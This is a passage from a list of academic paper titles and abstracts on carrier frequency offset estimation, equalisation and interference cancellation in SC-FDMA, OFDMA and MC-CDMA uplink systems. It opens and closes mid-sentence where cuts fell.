in single carrierfrequency division multiple access systems paper_content: When the duration of the cyclic prefix (CP) is shorter than that of the channel impulse response in single carrier-frequency division multiple access systems, inter-symbol interference and inter-carrier interference will degrade the system performance. Previously, one solution of this problem while considering the effect of carrier frequency offsets (CFOs) and the co-channel interference is a blind received beamforming scheme based on eigenanalysis in a batch mode. As the capability in suppressing the multipath signal with the delay larger than the CP length has not previously been analysed theoretically for the scheme, the theoretical analysis regarding the capability in suppressing the long-delayed multipath signal is provided in this study. The analysis provided in this study is also utilised to design an adaptive processing scheme. The adaptive algorithm is developed to find the beamforming weight vector updated on a per symbol basis without using reference signals. The proposed adaptive algorithm reduces the computational complexity of and shows competitive performance under the insufficient CP, the CFOs, the co-channel interference and the time-varying scenarios. The simulation results reveal that the proposed adaptive algorithm provides better performance than the previously proposed algorithm. --- paper_title: Uplink single-carrier frequency division multiple access system with joint equalisation and carrier frequency offsets compensation paper_content: Similar to the orthogonal frequency division multiple access (OFDMA) system, the single-carrier frequency division multiple access (SC-FDMA) system also suffers from frequency mismatches between the transmitter and the receiver. As a result, in this system, the carrier frequency offsets (CFOs) disrupt the orthogonality between subcarriers and give rise to inter-carrier interference (ICI) and multiple access interference (MAI) among users. The authors present a new minimum mean square error (MMSE) equaliser, which jointly performs equalisation and carrier frequency offsets (CFOs) compensation. The mathematical expression of this equaliser has been derived taking into account the MAI and the channel noise. A low complexity implementation of the proposed equalisation scheme using a banded matrix approximation is presented here. From the obtained simulation results, the proposed equalisation scheme is able to enhance the performance of the SC-FDMA system, even in the presence of estimation errors. --- paper_title: Adaptive Frequency-Domain RLS DFE for Uplink MIMO SC-FDMA paper_content: It is well known that, in the case of highly frequency-selective fading channels, the linear equalizer (LE) can suffer significant performance degradation compared with the decision feedback equalizer (DFE). In this paper, we develop a low-complexity adaptive frequency-domain DFE (AFD-DFE) for single-carrier frequency-division multiple-access (SC-FDMA) systems, where both the feedforward and feedback filters operate in the frequency domain and are adapted using the well-known block recursive least squares (RLS) algorithm. Since this DFE operates entirely in the frequency domain, the complexity of the block RLS algorithm can be substantially reduced when compared with its time-domain counterpart by exploiting a matrix structure in the frequency domain. Furthermore, we extend our formulation to multiple-input–multiple-output (MIMO) SC-FDMA systems, where we show that the AFD-DFE enjoys a significant reduction in computational complexity when compared with the frequency-domain nonadaptive DFE. Finally, extensive simulations are carried out to demonstrate the robustness of our proposed AFD-DFE to high Doppler and carrier frequency offset (CFO). --- paper_title: Combined MMSE-FDE and Interference Cancellation for Uplink SC-FDMA with Carrier Frequency Offsets paper_content: Due to its lower peak-to-average power ratio (PAPR) compared with orthogonal frequency division multiple access (OFDMA), single carrier frequency division multiple access (SC-FDMA) has been recently accepted as the uplink multiple access scheme in the Long Term Evolution (LTE) of cellular systems by the Third Generation Partnership Project (3GPP). However, similar to OFDMA, carrier frequency offset (CFO) can destroy the orthogonality among subcarriers and degrade the performance of SC-FDMA. To mitigate the effect of CFOs, we propose a combined minimum mean square error frequencydomain equalization (MMSE-FDE) and interference cancellation scheme. In this scheme, joint FDE with CFO compensation (JFC) is utilized to obtain the initial estimation for each user. In contrast to previous schemes, where the FDE and CFO compensation are done separately, in JFC, the MMSE FDE is designed to suppress the MUI after CFO compensation. To further eliminate the MUI, we combine JFC with parallel interference cancellation (PIC). In particular, we iteratively design the MMSE FDE equalizer to suppress the remaining MUI at each stage and obtain better estimation. Simulation results show that the proposed scheme can significantly improve the system performance. --- paper_title: CFO Estimation and Compensation in SC-IFDMA Systems paper_content: Single carrier interleaved frequency division multiple access (SC-IFDMA) has been recently receiving much attention for uplink multiuser access in the next generation mobile systems because of its lower peak-to-average transmit power ratio (PAPR). In this paper, we investigate the effect of carrier frequency offset (CFO) on SC-IFDMA and propose a new low-complexity time domain linear CFO compensation (TD-LCC) scheme. The TD-LCC scheme can be combined with successive interference cancellation (SIC) to further improve the system performance. The combined method will be referred to as TD-CC-SIC. We shall study the use of user equipment (UE) ordering algorithms in our TD-CC-SIC scheme and propose both optimal and suboptimal ordering algorithms in the MMSE sense. We also analyze both the output SINR and the BER performance of the proposed TD-LCC and TD-CC-SIC schemes. Simulation results along with theoretical SINR and BER results will show that the proposed TD-LCC and TD-CC-SIC schemes greatly reduce the CFO effect on SC-IFDMA. We also propose a new blind CFO estimation scheme for SC-IFDMA systems when the numbers of subcarrier sets allocated to different UEs are not the same due to their traffic requirements. Compared to the conventional blind CFO estimation schemes, it is shown that by using a virtual UE concept, the proposed scheme does not have the CFO ambiguity problem, and in some cases can improve the throughput efficiency since it does not need to increase the length of cyclic prefix (CP). --- paper_title: Suppression of ICI and MAI in SC-FDMA communication system with carrier frequency offsets paper_content: Similar to other orthogonal frequency division multiplexing (OFDM)-based systems, carrier frequency offset (CFO) is a challenging problem in uplink communications of single carrier frequency division multiple access (SC-FDMA) system. It must be noticed that CFO, which is mainly due to oscillator instability and/or Doppler shift, would generate inter carrier interference (ICI) as well as multi-access interference (MAI) to disturb the received signals and seriously degrade system performance. Frequency synchronization in uplink communications is difficult because different users always experience different CFOs and one user's CFO correction would misalign other users. In this paper, we proposed a suppression method to overcome the multi CFOs problem. To implement this algorithm, block type pilots would be exploited, which is also utilized in LTE uplink standard. The proposed algorithm is based on the following two assumptions. Firstly the proposed algorithm is applied in this scenario, where different users start to communicate with the base station at different symbol periods, and secondly, during the pilot block and the following data blocks, the CFO of each user is quasi static, which is feasible since CFO is slow varying. Compared with other interference suppression methods, the proposed method could directly estimate the interference components from the inverse pilot matrix, thus it does not need to do the CFO estimation. Further more, since block type pilots is a common pilot pattern in wireless communication system, this algorithm can be easily extended to other communication system. Simulation results show that the proposed suppression algorithm can significantly improved system performance. --- paper_title: Low-complexity joint regularised equalisation and carrier frequency offsets compensation scheme for single-carrier frequency division multiple access system paper_content: Since the conventional zero-forcing receiver does not operate satisfactorily in interference-limited environments, because of its noise amplification; the statistics of the transmitted data and the additive noise are required for the minimum-mean-square error receiver; the potential of the regularised receiver is proposed and investigated in this study to cope with these problems. In this study, the authors introduce an efficient low-complexity joint regularised equalisation and carrier frequency offset compensation (LJREC) scheme for single-carrier frequency division multiple access system. The proposed LJREC scheme avoids the noise amplification problem and the estimation of the signal-to-noise ratio and the interference matrices of other users. From the obtained simulation results, the proposed scheme enhances the system performance with lower complexity and sufficient robustness to the estimation errors. --- paper_title: Blind Channel Shortening for Asynchronous SC-IFDMA Systems with CFOs paper_content: This paper proposes a blind channel shortening algorithm for uplink reception of a single-carrier interleaved frequency-division multiple-access (SC-IFDMA) system transmitting over a highly-dispersive channel, which is affected by both timing offsets (TOs) and frequency offsets (CFOs). When the length of the cyclic prefix (CP) is insufficient to compensate for channel dispersion and TOs, a common strategy is to shorten the channel by means of time-domain equalization, in order to restore CP properties and ease signal reception. The proposed receiver exhibits a three-stage structure: the first stage performs blind shortening of all the user channel impulse responses (CIRs), by adopting the minimum mean-output energy criterion, without requiring neither a priori knowledge of the CIRs to be shortened, nor preliminary compensation of the CFOs; the second stage performs joint compensation of the CFOs; finally, to alleviate noise amplification effects, possibly arising from CFO compensation, the third stage implements per-user signal-to-noise ratio (SNR) maximization, without requiring knowledge of the shortened CIRs. A theoretical analysis is carried out to assess the effectiveness of the proposed shortening algorithm in the high-SNR regime; moreover, the performances of the overall receiver are validated and compared with those of existing methods by extensive Monte Carlo computer simulations. --- paper_title: Joint Low-Complexity Equalization and Carrier Frequency Offsets Compensation Scheme for MIMO SC-FDMA Systems paper_content: Due to their noise amplification, conventional Zero-Forcing (ZF) equalizers are not suited for interference-limited environments such as the Single-Carrier Frequency Division Multiple Access (SC-FDMA) in the presence of Carrier-Frequency Offsets (CFOs) . Moreover, they suffer increasing complexity with the number of subcarriers and in particular with Multiple-Input Multiple-Output (MIMO) systems. In this letter, we propose a Joint Low-Complexity Regularized ZF (JLRZF) equalizer for MIMO SC-FDMA systems to cope with these problems. The main objective of this equalizer is to avoid the direct matrix inversion by performing it in two steps to reduce the complexity. We add a regularization term in the second step to avoid the noise amplification. From the obtained simulation results, the proposed scheme is able to enhance the system performance with lower complexity and sufficient robustness to estimation errors. --- paper_title: Improved Detection of Uplink OFDM-IDMA Signals with Carrier Frequency Offsets paper_content: This letter proposes an improved detection scheme to mitigate the influence of carrier frequency offsets (CFOs) in uplink orthogonal frequency division multiplexing-interleave division multiple access (OFDM-IDMA) systems. The basic principle is to iteratively estimate and cancel the combined interference from multiple users and CFOs at the receiver so that the additional interference due to the residual CFOs from other users can be suppressed. Simulation results show that the proposed scheme can effectively eliminate the interference and significantly improve the system performance in the presence of CFOs. --- paper_title: MMSE Solution for OFDMA Systems with Carrier Frequency Offset Correction paper_content: The multi-access orthogonal frequency division multiplexing (OFDMA) technology has drawn a lot of attention in next generation wireless mobile communications. It is well-known that carrier frequency offsets in OFDMA systems can destroy the orthogonality among subcarriers and produce intercarrier interference (ICI) and multiuser interference (MUI). In our previous works, we proposed a common carrier frequency offset (CCFO) correction scheme at the OFDMA receiver, which can reduce the ICI/MUI effect and the bit error rate. In the scheme, the CFO correction can be performed by adaptively converging the MSE between the demodulated output and the decision feedback data. This paper studies the minimum MSE solution for the CCFO value, and the result is exploited to verify the adaptive CCFO estimation algorithm by means of the decision feedback. Simulation results show that the adaptive decision feedback scheme for CCFO estimation is effective and the minimum MSE performance is well achieved. --- paper_title: Multi-User Interference Cancellation Schemes for Carrier Frequency Offset Compensation in Uplink OFDMA paper_content: Each user in the uplink of an Division Multiple Access (OFDMA) system may experience a different carrier frequency offset (CFO). These uncorrected CFOs destroy the orthogonality among subcarriers, causing inter-carrier interference and multi-user interference, which degrade the system performance severely. In this paper, novel time-domain multi-user interference cancellation schemes for OFDMA uplink are proposed. They employ an architecture with multiple OFDMA-demodulators to compensate for the impacts of multi-user CFOs at the base station's side. Analytical and numerical evaluations show that the proposed schemes achieve a significant performance gain compared to the conventional receiver and a reference frequency-domain multi-user interference cancellation scheme. In a particular scenario, a maximum CFO of up to 40% of the subcarrier spacing can be tolerated, and the CFO-free performance is maintained in the OFDMA uplink. --- paper_title: Frequency Synchronization for Multiuser MIMO-OFDM System Using Bayesian Approach paper_content: This paper addresses the problem of frequency synchronization in multiuser multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. Different from existing work, a Bayesian approach is used in the parameter estimation problem. In this paper, the Bayes estimator for carrier frequency offset (CFO) estimation is proposed and the Bayesian Cram'er-Rao bound (BCRB) is also derived in closed form. Direct implementation of the resultant estimation scheme with conventional methods is challenging since a high degree of mathematical sophistication is always required. To solve this problem, the Gibbs sampler is exploited with an efficient sample generation method. Simulation results illustrate the effectiveness of the proposed estimation scheme. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for Uplink MIMO-OFDMA Systems Using Parallel Schmidt Rao-Blackwellized Particle Filters paper_content: Joint carrier frequency offset (CFO) and channel estimation for uplink MIMO-OFDMA systems over time-varying channels is investigated. To cope with the prohibitive computational complexity involved in estimating multiple CFOs and channels, pilot-assisted and semi-blind schemes comprised of parallel Schmidt Extended Kalman filters (SEKFs) and Schmidt-Kalman Approximate Particle Filters (SK-APF) are proposed. In the SK-APF, a Rao-Blackwellized particle filter (RBPF) is developed to first estimate the nonlinear state variable, i.e. the desired user's CFO, through the sampling-importance-resampling (SIRS) technique. The individual user channel responses are then updated via a bank of Kalman filters conditioned on the CFO sample trajectories. Simulation results indicate that the proposed schemes can achieve highly accurate CFO/channel estimates, and that the particle filtering approach in the SK-APF outperforms the more conventional Schmidt Extended Kalman Filter. --- paper_title: A Novel Subspace Decomposition-Based Detection Scheme with Soft Interference Cancellation for OFDMA Uplink paper_content: Abstract-In this paper we propose a novel subspace decomposition-based detection scheme with the assistance of soft interference cancellation in the uplink of interleaved orthogonal frequency division multiple access (OFDMA) systems. By utilizing the inherent data structure, the interference is first separated with the desired symbol and then further decomposed into the one caused by the residues of decision errors and the other one by the undetected symbols in the successive interference cancellation (SIC) process.With such an ingenious interference decomposition along with the soft processing scheme, the new receiver can render more thorough interference cancellation, which in turn entails enhanced system performance. Moreover, for practical implementations, a low-complexity version, which only deal with the principal components of inter-carrier interference (ICI), is also addressed. Conducted simulations show that the developed receiver and its low-complexity implementation can provide superior performance compared with pervious works and is resilient to the presence of carrier-frequency offsets (CFOs). The low complexity implementation, in particular, requires substantially lower computational overhead with only slight performance loss. --- paper_title: An Improved Frequency Offset Estimation Based on Companion Matrix in Multi-User Uplink Interleaved OFDMA Systems paper_content: In this letter, we consider a multiuser uplink orthogonal frequency-division multiple access (OFDMA) system. To estimate the carrier frequency offset (CFO) efficiently, a modified pilot structure has been proposed to allow sufficient frequency separation between the subcarriers allocated to any two users. The proposed structure can reduce the ambiguity problem caused by the multiple signal classification (MUSIC) based algorithm when a CFO of one user is close to that of a different user. We present a CFO estimation method based on the companion matrix obtained using the received signal from the proposed pilot structure. Simulation results show that the proposed CFO estimator performs better than the conventional estimator and maintains its performance as the CFO range increases. --- paper_title: Low complexity scheme for carrier frequency offset estimation in orthogonal frequency division multiple access uplink paper_content: Maximum likelihood (ML) carrier-frequency offset estimation for orthogonal frequency-division multiple access uplink is a complex multi-parameter estimation problem. The ML approach is a global optima search problem, which is prohibitive for practical applications because of the requirement of multidimensional exhaustive search for a large number of users. There are a few attempts to reduce the complexity of ML search by applying evolutionary optimisation algorithms. In this study, the authors propose a novel canonical particle swarm optimisation (CPSO)-based scheme, to reduce the computational complexity without compromising the performance and premature convergence. The proposed technique is a two-step process, where, in the first step, low resolution alternating projection frequency estimation (APFE) is used to generate a single better positioned particle for CPSO, followed by an actual CPSO procedure in second step. The mean square error performance of the proposed scheme is compared with existing low complexity algorithms namely APFE and linear particle swarm optimisation with mutation. Simulation results presented in this study show that the new scheme completely avoids premature convergence for a large number of users as high as 32. --- paper_title: Joint Carrier Frequency Offset and Direction of Arrival Estimation via Hierarchical ESPRIT for Interleaved OFDMA/SDMA Uplink Systems paper_content: In this paper, we propose an efficient algorithm to jointly estimate the directions of arrival (DOAs) and carrier frequency offsets (CFOs) in interleaved orthogonal frequency division multiple access / space division multiple access (OFDMA/SDMA) uplink networks. The algorithm makes use of the signal structure by estimating the CFOs and DOAs in a hierarchical tree structure, in which two CFO estimations and one DOA estimation are employed alternatively. One special feature in the proposed algorithm is that the algorithm proceeds in a coarse-fine manner with temporal filtering or spatial beamforming being invoked between the parameter estimations to decompose the signals progressively into subgroups so as to enhance the estimation accuracy and lower the computational overhead. Simulations show that the proposed algorithm can provide satisfactory performance with increased channel capacity. --- paper_title: MMSE-Based CFO Compensation for Uplink OFDMA Systems with Conjugate Gradient paper_content: In this paper, we present a low-complexity carrier frequency offset (CFO) compensation algorithm based on the minimum mean square error (MMSE) criterion for uplink orthogonal frequency division multiple access systems. CFO compensation with an MMSE filter generally requires an inverse operation on an interference matrix whose size equals the number of subcarriers. Thus, the computational complexity becomes prohibitively high when the number of subcarriers is large. To reduce the complexity, we employ the conjugate gradient (CG) method which iteratively finds the MMSE solution without the inverse operation. To demonstrate the efficacy of the CG method for our problem, we analyze the interference matrix and present several observations which provide insight on the iteration number required for convergence. The analysis indicates that for an interleaved carrier assignment scheme, the maximum iteration number for computing an exact solution is at most the same as the number of users. Moreover, for a general carrier assignment scheme, we show that the CG method can find a solution with far fewer iterations than the number of subcarriers. In addition, we propose a preconditioning technique which speeds up the convergence of the CG method at the expense of slightly increased complexity for each iteration. As a result, we show that the CFO can be compensated with substantially reduced computational complexity by applying the CG method. --- paper_title: Blind Carrier Frequency Offset Estimation for Interleaved OFDMA Uplink paper_content: In this paper, we develop two novel blind carrier frequency offset (CFO) estimators for interleaved orthogonal frequency division multiple access (OFDMA) uplink transmission in a multiantenna system. The first estimator is the subspace-based one and could blindly estimate multiple CFOs from a rank reduction approach. The second estimator is based on the maximum likelihood (ML) approach and improves the performance as compared to the first one. The higher computational complexity of the ML estimator is alleviated by the alternating projection (AP) method. Both the proposed estimators support fully loaded data transmissions, i.e., all subcarriers being occupied, which provides higher bandwidth efficiency as compared to the existing schemes. The numerical results are then provided to corroborate the proposed studies. --- paper_title: Low complexity LS and MMSE based CFO compensation techniques for the uplink of OFDMA systems paper_content: Orthogonal frequency division multiple access (OFDMA), where different subcarriers are allocated to different users, has been adopted for the uplink of several standards and has attracted a great deal of attention as a result. However, OFDMA is highly sensitive to carrier frequency offset (CFO) between the transmitter and receiver. In the uplink, different carrier frequency offsets due to different users can adversely affect subcarrier orthogonality. We propose a low complexity CFO compensation approach that addresses this problem while maintaining optimal performance. This approach is based on the least squares and minimum mean square error criteria applicable to interleaved and block interleaved carrier assignment schemes. The proposed algorithms use the special block circulant property of the interference matrix. In contrast to existing CFO compensation techniques, our algorithms do not rely on iterations or approximations. We present our approach in this paper and describe how a considerable reduction in computational complexity can be achieved by adopting it. --- paper_title: A Time Domain Inverse Matrix Receiver for CFO Suppression in WIMAX Uplink System paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, orthogonal multiple subcarriers are assigned to different users for parallel high data rate communications. However, carrier frequency offset (CFO), which is mainly due to oscillator mismatches and/or Doppler shift, will destroy the orthogonality among subcarriers and introduce intercarrier interference (ICI) as well as multiple-access interference (MAI) in uplink scenario. Thus, system performance will be seriously degraded. To overcome this problem, it is of great importance to do research on suppression of the interferences caused by CFO. In this paper, we proposed a novel time domain inverse matrix receiver to suppress the interference of multiple CFOs. Compared with the conventional frequency domain direct ZF inverse matrix method, which has high complexity in obtaining the ICI matrix and its inverse matrix, the proposed method has very low complexity in obtaining the interference matrix. Furthermore, the signal after interference suppression is a frequency domain signal. Thus the receiver complexity can be simplified. Simulation results show that this algorithm has almost the same performance to the frequency domain direct ZF inverse matrix method. --- paper_title: Blind carrier frequency offset estimation for tile-based orthogonal frequency division multiple access uplink with multi-antenna receiver paper_content: In this study, the authors propose a blind carrier frequency offset (CFO) estimation method for the tile structure orthogonal frequency division multiple access (OFDMA) uplink with multi-antenna receiver. They employ an iterative approach to extract the signal component for each user gradually and propose a carefully designed CFO estimator to update the CFO estimate during the iterative procedure. The key ingredient of the proposed method is using few subcarriers on both sides within each tile as the ‘guard subcarriers’, which can greatly mitigate the effect of multi-user interference. The proposed method supports not only fully loaded transmissions, but also the generalised assignment scheme that provides the flexibility for dynamical resource allocation. The numerical results are provided, which indicate that the proposed method can almost converge to the analytical lower bound within a few iterative cycles. It is seen that the proposed method also outperforms the existing competitor with multi-antenna receiver in terms of estimation performance, especially with few adopted blocks. --- paper_title: Low Complexity Pilot Assisted Carrier Frequency Offset Estimation for OFDMA Uplink Systems paper_content: In this letter, we propose a low complexity pilot aided carrier frequency offset (CFO) estimation algorithm for orthogonal frequency division multiplexing access (OFDMA) uplink systems based on two consecutive received OFDMA symbols. Assuming that the channels and the CFOs are static over the two consecutive symbols, we express the second received OFDMA symbol in terms of the CFOs and the first OFDMA symbol. Based on this signal model, a new estimation algorithm which obtains the CFOs by minimizing the mean square distance between the received OFDMA symbol and its regenerated signal is provided. Also, we implement the proposed algorithm via fast Fourier transform (FFT) operations by utilizing the block matrix inversion lemma and the conjugate gradient method. Simulation results show that the proposed algorithm approaches the average Cramer Rao bound for moderate and high signal to noise ratio (SNR) regions. Moreover, the algorithm can be applied for any carrier assignment schemes with low complexity. --- paper_title: Trade off between Frequency Diversity and Robustness to Carrier Frequency Offset in Uplink OFDMA System paper_content: In this paper, we investigate the effect of subcarrier allocation on the CFO for uplink OFDMA systems. Carriers are allocated to the users in order to get maximum throughput by making use of the channel frequency diversity. But in systems with CFO, while allocating the carriers to the users, attention must be paid to the ICI resulting due to CFO. In this paper we propose a carrier allocation scheme that provides a good compromise between the throughput maximization and robustness to the CFO induced ICI for systems with and without channel state information (CSI). --- paper_title: Frequency Offset Estimation in 3G LTE paper_content: 3G Long Term Evolution (LTE) technology aims at addressing the increasing demand for mobile multimedia services in high user density areas while maintaining good performance in extreme channel conditions such as high mobility of High Speed Trains. This paper focuses on the latter aspect and compares different algorithms for the uplink frequency offset estimation in LTE Base Stations (eNodeB). A frequency-domain maximum-likelihood based solution is proposed, taking profit of the available interference-free OFDM symbols de-mapped (or de-multiplexed) at the output of the FFT of an OFDMA multi-user receiver. It is shown to outperform the state-of-the-art CP correlation approach on both link-level performance and complexity aspects. --- paper_title: ML Detection with Successive Group Interference Cancellation for Interleaved OFDMA Uplink paper_content: To mitigate the interference caused by multiple carrier frequency offsets (CFO) of distributed users, a maximum likelihood (ML) detection with group-wise successive interference cancellation (GSIC) is proposed for interleaved Orthogonal Frequency Division Multiplexing Access (OFDMA) uplink. By exploiting the interference characteristics and the finite alphabet property of transmitted symbols, the proposed scheme first extracts the block diagonal of the frequency domain channel matrix and then employs ML detection via sphere decoding in each block. The decisions obtained from the detected blocks are used to mitigate the interference to the residual blocks. Numerical results show that the proposed scheme outperforms both the minimum mean square error (MMSE) detection and parallel interference cancellation (PIC) with affordable computational complexity. --- paper_title: Frequency Synchronization for the OFDMA Uplink Based on the Tile Structure of IEEE 802.16e paper_content: The multiple carrier frequency offsets (CFOs) of multiple users make frequency synchronization a challenging task in the orthogonal frequency-division multiple-access (OFDMA) uplink. In this paper, a computationally efficient iterative CFO estimation and compensation method for the OFDMA uplink with the generalized subcarrier allocation scheme (CAS) based on the tile structure of IEEE 802.16e is proposed. The proposed method only needs a few iteration cycles for its convergence. It greatly lowers the computational cost for the existing methods and can achieve better CFO estimation and compensation performance. --- paper_title: Carrier Frequency Offset Estimation in OFDMA using Digital Filtering paper_content: This letter deals with the frequency synchronization problem in the uplink of OFDMA communications systems with interleaved or generalized subcarrier allocation. An algorithm to estimate the carrier frequency offsets (CFOs) of all the active users is presented. The estimator relies upon finding the zeros of a suitable designed filter. The design of the filter boils down to the solution of a least squares (LS) problem and thus entails relatively low complexity. While under low subcarrier load conditions the estimation root mean squared error (RMSE) is higher than that of other existing methods, under heavy or full load achieves comparable and even superior performance. --- paper_title: Carrier Frequency Offset Estimation for Uplink OFDMA Using Partial FFT Demodulation paper_content: Fast and accurate Carrier Frequency Offset (CFO) estimation is a problem of significance in many multi-carrier modulation based systems, especially in uplink Orthogonal Frequency Division Multiple Access (OFDMA) where the presence of multiple users exacerbates the inter-carrier interference (ICI) and results in multi-user interference (MUI). In this paper, a new technique called partial FFT demodulation is proposed. Estimators for the CFO are derived by considering an approximated matched filter for each user, implemented efficiently using several FFTs operating on sub-intervals of an OFDM block. Through simulations, the feasibility and performance of the proposed estimators are demonstrated. Associated trade-offs are discussed. --- paper_title: Generalised grouped minimum mean-squared errorbased multi-stage interference cancellation scheme for orthogonal frequency division multiple access uplink systems with carrier frequency offsets paper_content: In uplink orthogonal frequency division multiple access (OFDMA) systems with carrier frequency offsets (CFOs), there always be a dilemma that high performance and low complexity cannot be obtained simultaneously. In this study, in order to achieve better trade-off between performance and complexity, the authors propose a grouped minimum mean squared error (G-MMSE)-based multi-stage interference cancellation (MIC) scheme. The first stage of the proposed scheme is a G-MMSE detector, where the signal is detected group by group using banks of partial MMSE filters. The signal group can be either user based or subcarrier based. Multiple novel interference cancellation (IC) units are serially concatenated with the G-MMSE detector. Reusing the filters in the G-MMSE detector significantly reduces the computational complexity in the subsequent IC units as shown by the complexity analysis. The performance of the proposed G-MMSE-MIC schemes are evaluated by theoretical analysis and simulation. The results show that the proposed schemes outperform other existing schemes with considerably low complexity. --- paper_title: Blind Maximum-Likelihood Carrier-Frequency-Offset Estimation for Interleaved OFDMA Uplink Systems paper_content: Blind maximum-likelihood (ML) carrier-frequency-offset (CFO) estimation is considered to be difficult in interleaved orthogonal frequency-division multiple-access (OFDMA) uplink systems. This is because multiple CFOs have to be simultaneously estimated (each corresponding to a user's carrier), and an exhaustive multidimensional search is required. The computational complexity of the search may be prohibitively high. Methods such as the multiple signal classification and the estimation of signal parameters via the rotational invariance technique have been proposed as alternatives. However, these methods cannot maximize the likelihood function, and the performance is not optimal. In this paper, we propose a new method to solve the problem. With our formulation, the likelihood function can be maximized, and the optimum solution can be obtained by solving a polynomial function. Compared with the exhausted search, the computational complexity can be reduced dramatically. Simulations show that the performance of the proposed method can approach that of the Cramer-Rao lower bound. --- paper_title: Carrier Frequency Offset Tracking in the IEEE 802.16e OFDMA Uplink paper_content: The IEEE 802.16e standard for nomadic wireless metropolitan area networks adopts orthogonal frequency-division multiple-access (OFDMA) as an air interface. In these systems, residual carrier frequency offsets (CFOs) between the uplink signals and the base station local oscillator give rise to interchannel interference (ICI) as well as multiple access interference (MAI). Accurate CFO estimation and compensation is thus necessary to avoid a serious degradation of the error-rate performance. In this work, we address the problem of CFO tracking in the IEEE 802.16e uplink and present a closed-loop solution based on the least-squares (LS) principle. In doing so, we exploit a set of pilot tones that are available in each user's subchannel. The resulting scheme can be implemented with affordable complexity and is able to reliably track the CFOs of all active users. When used in conjunction with a frequency offset compensator, it can effectively mitigate ICI and MAI, thereby allowing channel equalization and data detection to follow directly. Numerical simulations are used to demonstrate the effectiveness of the proposed solution in the presence of residual time-varying frequency offsets. --- paper_title: A Scheme to Support Concurrent Transmissions in OFDMA Based Ad Hoc Networks paper_content: In this paper, we propose a novel system architecture to realize OFDMA in ad hoc networks. A partial time synchronization strategy is presented based on the proposed system model. This proposed scheme can support concurrent transmission without global clock synchronization. We also propose a null subcarrier based frequency synchronization scheme to estimate and compensate frequency offsets in a multiple user environment. The simulation results show a good performance of our proposed synchronization scheme in terms of frequency offset estimation error and variance. --- paper_title: Efficient carrier frequency offset estimation for orthogonal frequency-division multiple access uplink with an arbitrary number of subscriber stations paper_content: An efficient method is proposed to estimate the carrier frequency offsets (CFOs) in the orthogonal frequency-division multiple access (OFDMA) uplink. The conventional alternating projection method is accelerated by utilising the inherited properties of the matrices involved. The multiplication of large sparse projection matrices can be elegantly transformed to a series of products involving small dense matrices, and the inverse operation of these large matrices can be substituted by direct computations. Hence, the computational cost is significantly reduced without compromising the accuracy of the CFO estimation. --- paper_title: MCMOE-Based CFO Estimator Aided With the Correlation Matrix Approach for Alamouti's STBC MC-CDMA Downlink Systems paper_content: This paper addresses the estimation problem of carrier frequency offset (CFO) in the downlink transmission of space-time block-coded multicarrier code-division multiple-access (STBC MC-CDMA) systems over multipath fading. This study proposes a multiply constrained minimum output energy (MCMOE)-based blind CFO estimator, which is simply assisted by the presented correlation matrix approach to efficiently achieve the CFO estimate. We formulate a two-level CFO estimator by optimizing the receiver output power, as well as the data correlation matrix. At the first level, all possible CFO candidates are found by evaluating the well-defined estimated merit figure. Then, exploiting multiple constraints in the design of the MCMOE receiver, a criterion is used in level two to determine the exact CFO estimate. Numerical results are presented to verify that both precise CFO estimation and reliable error performance can be achieved, even when the channel is dominated by noise because the impact of CFO on the output signal-to-interference-plus-noise ratio (SINR) and bit error rate (BER) are effectively removed by the proposed CFO estimator. --- paper_title: SINR Lower Bound Based Multiuser Detector for Uplink MC-CDMA Systems with Residual Frequency Offset paper_content: For uplink multi-carrier code-division multiple access (MC-CDMA) systems, we propose a multiuser detector that is robust to a small residual frequency offset existing after frequency offset estimation and compensation. In this paper, when the residual frequency offset is normalized by subcarrier spacing, it is called a normalized residual frequency offset (NRFO). In the proposed scheme, we first derive a lower bound of the signal-to-interference plus noise ratio (SINR) of the desired user when the NRFO of the desired user is bounded by a small value and the value is known to the receiver. We then design a detection filter to maximize the SINR lower bound. Simulation results show that the proposed scheme has better SINR and bit error rate (BER) performances in a high signal-to-noise ratio (SNR) region than a conventional minimum mean square error (MMSE) receiver that ignores the NRFO. --- paper_title: Widely Linear MVDR Beamformers for Noncircular Signals Based on Time-Averaged Second-Order Noncircularity Coefficient Estimation paper_content: The optimal widely linear (WL) minimum variance distortionless response (MVDR) beamformer, which has a powerful performance for the reception of a noncircular signal, was proposed by Chevalier in 2009. Nevertheless, in spectrum monitoring or passive listening, the optimal WL MVDR beamformer is hard to implement due to an unknown second-order (SO) noncircularity coefficient. This paper aims at estimating the time-averaged SO noncircularity coefficient of a desired noncircular signal, whose waveform is unknown but whose steering vector is known, in the context of the optimal WL MVDR beamformer. The proposed noncircularity coefficient estimator can process 2N - 1 rectilinear signals at most using an array of N sensors. Moreover, a frequency-shift WL MVDR beamforming algorithm is proposed for a noncircular signal having a nonnull frequency offset or carrier residue, jointly with the estimation of the frequency offset of the rectilinear signal. Due to the inevitable estimation error of the time-averaged SO noncircularity coefficient, a diagonal loading technique is used to enhance the robustness of the optimal WL beamformers. Simulations are shown to verify the effectiveness of the proposed algorithms. --- paper_title: Iterative frequency-domain fractionally spaced receiver for zero-padded multi-carrier code division multiple access systems paper_content: In this study, the authors propose an improved frequency-domain fractionally spaced (FDFS) minimum mean square error (MMSE) receiver for zero-padded multi-carrier code division multiple access (MC-CDMA) systems when the guard interval is not enough to avoid the inter-symbol interference (ISI) caused by the multipath channel. The proposed novel iterative FDFS-based receivers firstly reconstruct the received symbol to reduce the ISI and then followed by the FDFS-based equalisers to minimise the effect of ISI and inter-carrier interference (ICI) caused by carrier frequency offset (CFO) and Doppler shifts. A few iterations are performed to achieve the expected bit error rate (BER) performance. To reduce the receiver complexity, the novel simplified diagonal FDFS-based receivers with a fixed noise variance are developed with slight performance degradation. The proposed iterative receivers have never been studied in the existing literature. Simulation results show that the proposed iterative FDFS-based receivers can significantly improve the BER performance of the conventional FDFS-MMSE receiver in severe multiple interferences environments caused by multipath, CFO and Doppler shift. --- paper_title: Multi-tone CDMA design for arbitrary frequency offsets using orthogonal code multiplexing at the transmitter and a tunable receiver paper_content: The authors propose a new multi-tone (MT) code division multiple access (CDMA) design which has a superior bit error rate (BER) performance than conventional MT CDMA in the presence of frequency offset. The design involves multiplexing of Walsh codes onto the sub-carriers in conjunction with double differential modulation. To exploit the full potential of the design a partial correlation receiver has been proposed. Depending on the signal-to-noise ratio (SNR) and frequency offset it is possible to tune this receiver for the best possible performance. The simulated BER performance of the proposed system has been found to be better than MT CDMA for small as well 